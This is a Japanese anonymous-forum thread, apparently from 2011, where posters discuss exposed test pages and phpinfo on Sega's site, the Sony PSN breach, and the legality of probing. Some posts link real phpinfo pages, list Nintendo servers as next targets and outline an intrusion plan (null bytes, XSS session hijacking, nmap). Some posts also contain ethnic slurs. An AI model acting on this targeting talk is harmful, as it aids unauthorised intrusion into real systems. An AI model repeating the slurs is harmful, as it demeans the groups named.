例えばフリーライドは公開された回線とみなされて罰せられないよ

>>670
そうだっけ？

例えばディレクトリ一覧が表示できる状態のftpサーバがあって、そのURLを晒すと
罰せられるか？

えー なにこれまじで逮捕ものなの？
仮にこれが有罪だとして、民事なの？刑事なの？お値段いかほどなの？

そういえばソニー攻撃したとされるハカーさんはいかほどの刑になんのかな

脆弱性の公表なんてIPAとかニュースサイトもやってね？
罰せられるのか

IP制限だろうがなんだろうが何らかのアクセス制限を突破してるならクロ
公開しててクエリ無しGetで取れるなら違法性なんて無いだろう

>>664
俺この手のスキルは実績あるんだよね。
いやハッキングはしてねぇけどさ。
このスキルを犯罪じゃない方向に生かしたいもんだよまったく。

どうみてもセガのミス
>>677
ここはニュー速だぞ

これをXSSとか言ってるやつらまでいるしなｗ

>>601
この「符号」ってアクセス制限をかけるためのID/パスワードのことだ

セガの件は逮捕無理だと思うけどね
管理者が公開する気だったのかどうだったのかの判断の線引きをするとするなら
アクセス制限やgetのパラメータとかそんな程度で線引くしかないもん

実績ってやっぱり先月の下旬のやつですよね

>>679
ないな
公開サーバ内のディレクトリ名を電話帳攻撃のように片っ端からアクセスしても罪にならない

不正アクセスにあたらなくても普通に損害賠償が来ておかしくないレベルという気もする


通報するときちんとお返事くれるからな
お前らほどほどにしてやれよｗｗ

>>659
んじゃ俺はそのセキュリティ会社相手に勝負挑むね。
敵を引きずり降ろしてやればいつかはてっぺんが見える。
人の不幸で飯が旨い！

じゃあ俺が偶然うっかりphpinfo見ちゃったのも問題ないな(ﾟ∀ﾟ)

ソニーの実際見てみたけど
検索結果を表示するときにスタイルタグがそのままエスケープされてなくて適応されてるだけか
これじゃSQL出すのは無理だな

こんな適当な作りなら他にもいろいろ脆弱性ありそうだけど

VIP民より先にツイッター民入りましたー

http://twitter.com/#!/jumpy_a/status/66930285949886465

>>678
IPAが公表するのは対策が終わってから
通常の通知ルートは
　発見者→IPA→脆弱サイト運営者

サイト運営者が脆弱性を修正してIPAに報告するとそのタイミングで公開される

>>690
友達ができてよかったなぁ

　

>>691
んじゃ例えばこのmsearchって検索エンジンがバグ発見したんでバージョンアップしてください。
って言ったととしてそれ気づかずに放置してハッキングされたらどうなんの？
これってオープンソースでしょ？

>>691
ITmediaは修正前に公表してるな
まあ目に見えて問題広がってたからってのもあるかもしれないし、
もとはカペルスキーのブログだけど
http://www.itmedia.co.jp/news/articles/1009/21/news111.html

ちなみにこのtwitterへの奴は日本人が見つけたらしいね

>>695
おい、俺を晒すのはやめてくれよ。

>>694
ハッキングした奴が犯罪者になって警察に追われるだけ

隣の家のかぎが閉まってない！
2chに拡散

興味本意で家に入るとキッチンのカレーの鍋が！
2chに拡散

おまえがやったことはこれ

>>694
既知のバグ（パッチが出た状態）になったものを放置していればサイト運営者の責任

新規のバグでもフリーソフトなら泣き寝入りするしかないね運営者は
有償でサポート付きのソフトなら販売者になにがしか請求できるけど

そんなときのための保険もある

ハッカーびびってるへいへいへい

>>697
んじゃ公開した俺は悪くないってわけだよね。
俺はハッキングしてないわけだし何も実行してませんし。

誰がこれやってるんだろうな
GOOGLEは中国が組織的にやってたって言う結果だったんでしょ

>>700
くそったれが、phpinfo俺にも見せろよ羨ましい。

>>703
さがすまでもないよ

>>697
法律に違反した行為をしたなら犯罪者になる
http://ossforum.jp/node/687

>>658
詳細頼む

めんどくさいから
おまいらがアノニマスで
Sonyもセガもハックしたってことで
この問題はオシマイな

>>704
うへ、本当だw

>>708
psnもおまえがやったのか？

>>695
あ、これはね

発見者がtwitter上で脆弱性を大拡散して、CERTへの通知前に既知の脆弱性になってたからね

まさおへ
phpinfoはいつもの戸棚の中よ
　　　　　　　　　　　　　　母

>>709
やろうと思えばなんだってできる。
ただ足跡は残ってしまうんだよ。
それを偽装できてこそハッカー。
俺ができるのは強盗、ハッカーは泥棒だよ。

ってなわけで俺にはPSNは無理だし犯罪はするつもりはない。

>>705
それがどうしたんだ

PSNのはもっと複雑でしょ
3層のシステムで一番内側のDBサーバまで入って個人情報を全部抜いたんだから

技術のソニー(笑)

>>711
多分お前もプログラマの勘が働いてるんだろうな。

phpinfoはいいけど、その先は絶対にやるなよｗ

進展ねーなー

とんでもない！あたしゃしがないスクリプト書きだよ！

>>717
もう玄関も開けっ放し状態なんじゃないかコレ。

>>712
もう遅いお

セガは昔のサイトの残骸をサンプルとして残してんのか
顧客の個人情報漏洩をやらかしまくりのソニーとは比較にならんな

なんか腹立ってくるな、絶対セガ関係者いるだろこれ。
おまんちんするぞこら！

つまりニシくん大勝利って事か。

セガ社員が釣って遊んでる

>>723
一言言うと、ライブラハックの件もあるから、
冗談無しに一回捕まるかもなｗ

http://fatalita.sakura.ne.jp/news/archives/51394273.html

pj0g4

なんでこの程度のことで騒いでんだ？？？？？？？

そういや楽天もなんか以前プロ野球の優勝決定戦で「おめでとう、◯◯優勝記念セール！」ってのを両チーム用意してたな。
あそこもなんか眠ってそうだな。

>>713
だから>>697の「ハッキング」の内容によるってことだよ

>>726
名古屋県警じゃなければ、きっと大丈夫さｗ

>>730
最近はどこもCMSでサイト作ってるだろうからそういう素朴なのはあんまり残ってないかもよ

>>729
序盤以降馴れ合い

>>731
結局突っかかってるだけじゃない
文脈的にハッキングに侵入って意味を含んでるだろ
jail内だろうとhttpdの権限だろうとアクセス制限突破は違法

【PSN】ハッカーが第3の攻撃を計画中！！
http://kamome.2ch.net/test/read.cgi/ghard/1304661325/

ソニーの鯖から引っこ抜いた個人情報をＷｅｂで公開するって宣言してるけど、これを知らずに
踏んじゃったらそれだけでエラい目に会っちゃいそうだなｗ

もうソニーは日本だけでNGPを展開してりゃいいんだよ。
PS3なんて捨てちまえ。

>>736
残念だったな！既に自ら顧客情報を公開しているからその脅迫は無効！！！！

Wikiってサイト内の文変えれるじゃないですか。
あれと同じだと思ったんですよ！

裁判用

ソニー緊急記者会見
http://img.gazo-ch.net/bbs/11/img/200804/31993.jpg

>>738
下手したらセガが個人情報保護法に抵触するなｗ

>>738
他人にヤラれる位なら自分でヤっちまえってかｗ　潔すぎだけどちゃんと責任取れよｗｗｗ

セガの方はテストページだけだったか
すまんすまん

パソコ （＿_）ン蛾　　 ＼！！！ノートン先生.　！／　　 　 /　　ヽ＿＿＿
なおり（＿＿）ました！　＼！！！沈静化！！／　　 　 ／
　　　 （´д｀*）　 　 　 　 　 ＼！！！！！！／　　　　 /⌒ ＿__　　　⌒
　 ＿|￣￣||＿）　　　　　　　　＼∧∧∧∧／　　　　　　|　　|　　 |
／旦|――||/／ ／|　ｶﾀｶﾀ.　 ＜　直 パ　＞　　　　　　|　　|　 　 |　　　　　＊
|￣￣￣￣￣|￣| . |　　　　　　＜　り　ソ　＞　　　 　 　 |　├―‐┤
|＿＿＿＿＿|三|／　　　　　　＜　ま　コ　＞　　　　　　 ヽ
────────────＜　し　ン　＞─────────────
＿---―――――---＿　 　 ＜　た .蛾　＞　　ｼｭｳｳｳｳｳ･･・・・∬∬
　<　　 ＿,ノ , 、ヽ､＿　ノ 　　;;;＜　!!! 　　　＞直っちゃったよぉ　＿＿＿
　（　○）｀ヽ) ( ´（y○'）　 　;;;|／∨∨∨∨＼　 　 　 ∧＿∧ 　 |｜＼
　　⌒　/　　　　ヽ⌒　　 　／パソコン蛾直り＼　　（ *´∀｀）　 |｜　 |￣
やった　|~￣￣~.|　ああ／ました！ ディスプレ＼┌（　　つ／￣|| ／
ああ|　|||! i: |||! !| |あ .／イ蛾直りました！！！！＼ヽ ,|二二二」

>>1
ハッカーの交流サイトを自負するν速がまた勝ってしまったな…

裁判になったら糞プログラマを罵倒する方向で持ってくかな。
こんなものプログラムって言うんですか？
こんなもん公開しておいてプログラマ名乗ってるんですか？
こんなもん公開されてる状態は誰のミスでどんな顔で訴えたんでしょうねぇとか言ってやる。

ヒイィッ！蕎麦あげるからゆるして！
って言って桐箱に入った蕎麦を渡せば許してくれるんじゃないか
セガの本社のまわりは蕎麦屋ばかりだしあいつら多分蕎麦好きだわ

単にセガがIPAに通知して対策してサイトにお詫び文載せて終了だろ
見えるのが内部資料だけならお詫びも載せるかどうか

ID:ohF9QSU9P　舞い上がりすぎ

mill_testってなんだろうか。
millってユーザ名っぽいんだよなぁ。
mixiとかに繋げれそうな気がしてきた。

>>749
ごめんねぇ、こう見えても実績のある人間なんで君なんかより何倍も強いんですぅ。

マジかよ糞箱買ってくる

GKはさっさと>>272を本家GKに報告しろよ

　　　　　　　__ , --------　､__
　　　　　　, - ':::::::::::::::::::::::::::::::::::::::::＼
　　　　 ／ ；;;;;;;::::::::::::::::::::::::::::::::;;;;;;;;;;;;;;＼
　　　 /,,；,,,,,　 ；;;;;;;;;;;;;;;;;;;;;;;;;;;;;;；　　,,,,,,,；:::丶
　　 / :::::::::;；,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,；:::::::::::::::ヽ
　　 iﾞ:::;:::::||::::::ii:::::::::::||::::::::::::::::::;:::::::::::::::::::::::::::ﾞi
　　iﾞ::::|;;;;| |;;;;| |::::::::::| |:::::::::::::::::||:::::::::::::::::::::::::::::|
　. iﾞ::::::i　　　　 '''''''''''　'───' |;;;;;;;;;;::::::::::::::::::::|
　 .|:::::::|,-====-´　　ﾞヽ,,,,,,,,,,,,、　　　　|:::::::::::::::::::|
　 |;::::::::|,-----､　　　　~ニニ,,_`　 　　|:::::::::::::::::::|
　　｀ヽ､i　(､i´ﾉ　　　　　´い,, ﾉ '　　 　|;;;::::::::::::::/　　　割れ王子はソニー法務部から告訴されるん？
　　.　　 i　^~~~ー==-- 　ー'-+､　　 　 / ﾞ-､;;;;/　　　　　　　　　　
　　　　 {　　　　　 ヽゝ　　　　　　　　 　'-'~ノ
　　　　λ　　 ''ﾞﾞﾞ'''-''---､　　 　　　　/-'^
　　　　　ヽ,　　　　^~^　　　　　　　　 (
　　　　　/ 　｀丶 ､　　　　 , -　　　/^l
　　　　 |　　 /( ﾉ　｀''''''´~　 __, - '　 ﾞi､

すげえ伸びてるかと思ったら自称技術者のヒゲが５０レスくらい書いてた件

マジかよ糞箱買ってくる

テスト全くしてないレベルだろこれ

ヴォーヤベー

脆弱性(ぜいじゃくせい)だおd(^_^o

マジかよ糞箱買ってくる

短縮URLやめろ

いつ直すんだろ…

日本大企業のレベルの低さってホントひどいな

お前らの個人情報に価値はないから安心しろ

マジかよ糞箱買ってくる

>>26

もろよわ

キジャクセイ

日本の国力は確実に落ちてるね

3か月でとれる基本情報技術者持ちが1人でもいれば防げるレベルだな

2005年頃の中国による日本サイトのハッキング事件で対策を強化したところは多そうだけど、
なまじ2chのVIP板の連中が中国ハッカーに勝利してコミュニティ分断しちまったもんだから、
日本企業への被害は減って数年で対策レベルがまた元に戻ってる罠。

ソニーはこんなセキュリティで携帯端末なんて出すつもりなの

日本企業を潰したいのはわかる
日本人だからな
やっぱり本性はあさましいにひんじんだ　

●石原東京知事をアニヲタ反感利用して降ろそうと頑張ったのと同じ。
　（東京都の予算は韓国国家予算とほぼ同額。反中韓の石原降ろして支持者ねじ込むのは在日の当面の目標）

SONYは日本を代名する世界的テクノロジー企業。
コキ降ろせば、尻に乗ってのさばり始めた中韓とそれが抱える企業利権は計り知れない。

>>774
ソニーの対応がまかり通った場合の日本自体への悪影響のがでかいような

ソニー、怖くて使えないな

？？？？？ ？？

>>764
外国で集団訴訟の担当してる弁護士にとっては金の成る木に見えてると思うぞｗ

>>272はなんだったの？

セキュリティ対策なんか完全に甘く見てる企業ってことだろうね

PerlerがPHP(er)叩いてたけど
Perlのほうがやばいじゃんｗ

？ ？？？？？？？？？？？？？？？？？？？？？？？？？？

埋伏の毒

<=・ω・=>ウエーハッハハッハfirefoxはクソニダ
？？？？？？？？？？？？？？？？？？？？？？？？？？？？？？？？？？？？

>>781
PerlもPHPも危険度が高いのは同じ
時代はRubyとPython

　　　　　　　　,　-'⌒:::ヽ..、　　　　　　　　　　　
　　　　　　　 /:::::::::,:、:::::::::::＼　　　　　　　　　　
　　　　　　 /::::::::/ _,｀、、:::::::::＼　　.　　　　　　
　　　　　　 j::::::::/　rqrq ＼j):::::＜ 　　　多分お前もプログラマの勘が働いてるんだろうな。　　　　
　　　　　　≧::し 　　〈　 　 Y:::::::≦　　　　　　
　　　　　　　{:::::、. 　tz　　∧''"￣｀ '' --　、 　 　
　　　　　　　 ".´ト 、 ´ _ ,"　i|　　　　　　 　＼
　　　　　　　／ |i　　￣　　　ij　 　　' 　　￣｀　ヽ、
　　　　 　 ／　　'',,　 　|￣￣},　 　 　 y　　　　 　}
　　　　 ／　　　 　 、r´|＿_ !j.　　 　 /　　,,　-　''￣
　　　　/　　v　　　 i´　｀ー' ‖　　　.　,　────
　　　 /　　　| ,＞　'　　　 ／　　 　　,　　
　 　 /　　　 ´　　　　 ,　´..　 　 　 　| ,, , 、|
　 　 {　／　　　 　 ／　　, -一 、　　《〈l.j: |
　　　 、　　　　 ／　　／: : : : : : ヽ　 |: : : :|
　　　　ヽ、 , イ　　 ／ : : : : :,: : : : ＼|: : : :|
　　　　 　｀　 |　 ／ : : : : : : }}: : : : : : |: : : :|＿＿＿_
　　　　　　　 |／: : : : : : : :ノー-、 : : .|: : : : : : : : : : :
　　　　　　／: : : : : : : : ／ : : : : ',: : :└─────
　　　　 ／: : : : : : : : :／ : : : : : : }: : : : : : :ﾉ
￣ ヽ 、 : : : : : : : : ／v: : : : : : : :|: : : : : :/
ヽ、}　　＼ : : : : ／一|: : : : : : : :ｲー‐　'
　　＼　 　ヽ: ／ 　 　|: : : : : : : : |
..＼　　ヽ　 .v 　 　 　 ! : : : : : : : |

http://twitter.com/#!/nakanohito_1go/status/67062995234201601

ああよかった豚どもがバカさわぎしてただけか
チカニシは死んどけ
ソニーさんだかチョニーさん
エロ動画を見るにはすごく便利なんです・・・
ポルノステーション・・・お願いします
(；＾ω＾)

結局どうなったん

ﾁｮﾆｰってなんでこんなに弄られてんの？

サイトネタなのにルイズがいない

ルイズとはなんですの

>>276
声明も見つかったらしい

んなわけねーだろ

よくわからないけどNoscript入れといてよかった

平気で嘘わつくのはもうやめろという事だろこれは

個人サイト作り始めた時、いらないファイルは細目に消して残さないようにってアドバイス貰ったのを思い出したわ

ここは伸びない不思議

さすがに>>272>>382>>412>>447あたりは消されたね。
>>375とかは残ってるけど

ソニーと違って削除要請もせず、きちんと対処してるな

さすが俺達のセガ
次はphpinfoの削除も頼んだぜ

偉いなセガ。さすがだ。
それに比べてソニーときたら。

>>799見ると、セガの人間がこのスレの情報確認してるようだから、
いっそ出してやった方が、削除早いんじゃねーの。

http://sega.jp/phpinfo.php

これ見て多くの会社が鯖のセキュリティ見直してくれると良いんだけどな

き…脆弱

>>787
重要性わかってないみたいだし技術者にうまく丸め込まれてるしバカなんじゃねぇの？
痛い目みなきゃわかんないみたいだなこれは。

大阪

>>787
ってことは担当者はこの状態なら安全って言ったわけだよな。
今から穴みつけてやったらこの担当クビにできるかなぁ。
今回はここじゃなくてこいつに直接メッセージ送りつけてやるよ。

>>806
どういった感じで痛い目かご教授お願いします

そこまでセガの担当者を嫌わんでもｗ

>>810
スパムの発信源にされるかもしれないんだよこういう未熟な管理サーバは。
自社だけで片付くならまだしも信頼あるサーバ、大手のサーバからスパムくるわけないって思ってる人はどうなる。
俺はそうやって学んできたしその危険性だって十分理解している。

>>809
社内で最も重要なはずの本社のwebページでこれだから多分他のところもずさんな管理だと思われる。
何に使ってるかわからんけど他のサーバのIPもいくつかわかった。
他のサーバとの連携するために他のサーバのパスワードもあると思われる。
本社のwebサーバのパスワードわかれば他のサーバもある程度わかるしサーバ乗っ取ればPHPのファイルだって見れる。
つまり繋がってるとこほぼ全滅だと思うよ、こんな管理体制じゃ。
俺そこまでいけると確信してる。

>>812
昔に作ったというか下請けに放り投げたサイトをそのまま増築している感じなの？

>>813
俺もそう思う。ゲーム会社ってそういう体質のところ多いし

>>812
すごい自信だなw
昨今じゃコマンドインジェクション系の脆弱性は少ないから、管理が杜撰でも突破は難しいと思うがなぁ
古い放置cgiが次の狙い目だけども、ざっと見使えそうなのは無さげ
国産cgi中心だから既存のexploitを使うということは無理
cgiのソースコード見て、ログにアクセスしてみたけど公開設定は適切
%00を使えば何かできるかもだけど、何ができるかは若干パルプンテ
ブルートフォースはスマートじゃない
管理人にリンク踏ませてXSSを使ったセッションハイジャックは簡単だろうけど嫌いだな
後は放置鯖を狙うか…放置鯖狙いが見込みありそうだな
nmap -Oでどうこうかな

>>815
おまえのいいたいことを一般人向けに翻訳すると新聞紙１枚くらいに展開されるんだろうなあ（遠い目

>>815
パルプンテって何？
それだけ分からん

>>815
いいコピペになりそうだ

もう駄目だろ・・・この会社

>>817
ヌルバイト攻撃はphpだとエスケープをbypassできるぐらいなんだけど、
perlだと原理不明ながらポインタがおかしくなる場合があるっぽい (前回の2chのキャップ漏れの件。修正済みだけど)

SONY攻撃されすぎワロタ

sonic stageが糞すぎるから全力でいっていいぞ
再インスコすらできねー

ソニー程の企業がこの体たらくとは

>>817
ドラゴンクエストとか遊んだことないのか？

>>823
むしろ、ソニーならではの体たらくなんだが。中身を知らないやつだよ、そんなこと言うのは。

メッキが剥がれただけだよ

>>821大手は同じように攻撃うけたりするが、やっても無駄、難しいと思わせるだけの防御をしてるだけ

>>827
それでもWAFの効果は大きいだろ

>>774
よし次のターゲットはパナソかニンテンドーか

>>829
任天堂はざっと見しっかりしてる予感
まぁ良く分からないものはたくさんあるが
http://wifi-log.nintendo.co.jp/
http://nokonoko.nintendo.co.jp/
http://ninpat.nintendo.co.jp/
https://nisserver.nintendo.co.jp/
http://copy.nintendo.co.jp/
http://cgi.nintendo.co.jp/

>しっかりしてる予感
撤回、ダメだこりゃ

>>831
流石にhttpsプロトコルのサーバーは大丈夫・・・なの

sega の phpinfo も、今日中には見れなくなるかな。

海外のチカニシ野蛮すぎるだろ・・・土人かよ・・・
http://www.youtube.com/watch?v=zucnqSohfX8

>>774
ゴキ降ろせば？
確かに名
あいつら癌でしかない

ぜいじゃくせい　と　きじゃくせい
どっちが正解だったか忘れてきた

任天堂てｗゲハ板でやれｗｗ

あ…加藤愛

か…阿藤快

だめだこりゃ

年単位のセキュリティ対策しないとどうにもならないレベル
もう全サーバー止めろよ

セガの方がきじゃくだったって事かｗ

ちなみに不正アクセス禁止法に引っ掛からない方法でも
削除とか差し替えとかしちゃうと今度は業務妨害とかでアウトになる可能性があるから
悪い事はしちゃダメだぞ

>>842
まるでスレの流れが分かってないなお前
コピペブログに帰れよ殺すぞ

sega.jp の phpinfo が消えてる。
てか、やっぱ見てるんだな、セガの中の人。

おまえらこのように逮捕されるぞ
http://slashdot.jp/security/article.pl?sid=04/02/04/0531248
XSSつついてて逮捕

>>834
まさに文明人じゃん。人類の文明は剣から銃に進化してきたわけで、
デザートイーグル使ってPS3を破壊するなんて、まさに文明的行為そのもの。